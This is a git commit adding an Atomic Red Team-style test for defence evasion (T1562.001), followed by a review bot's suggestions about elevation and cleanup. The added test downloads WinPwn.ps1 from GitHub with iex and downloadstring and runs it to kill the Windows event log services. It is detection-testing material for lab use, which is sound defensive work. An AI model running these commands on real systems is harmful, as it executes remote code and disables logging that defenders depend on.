Update T1562.001.yaml (#1956)

Kill the event log services for stealth via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
tlor89
2022-05-12 17:54:22 -05:00
committed by GitHub
parent d2501a2832
commit 04edc6cdc1
+10 -1
@@ -633,4 +633,13 @@ atomic_tests:
command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
name: powershell
elevation_required: true
- name: WinPwn - Kill the event log services for stealth
description: Kill the event log services for stealth via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive
name: powershell
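Review bot: The new WinPwn test's `executor` declares neither `elevation_required: true` nor a `cleanup_command`, although the Backstab test just above it sets `elevation_required: true`. Stopping event logging almost certainly needs an elevated session, so an unelevated run would probably fail without the harness explaining why. After a successful run the host stays without event logging until the service is restored, which matters on any shared lab machine. I would add `elevation_required: true` and something like `cleanup_command: Restart-Service -Name EventLog -Force`, after confirming on a lab host that this actually brings logging back. The `description` only repeats the test name; one sentence on what a defender should expect to observe, such as a gap in event log records after the run, would make the test more useful for detection validation.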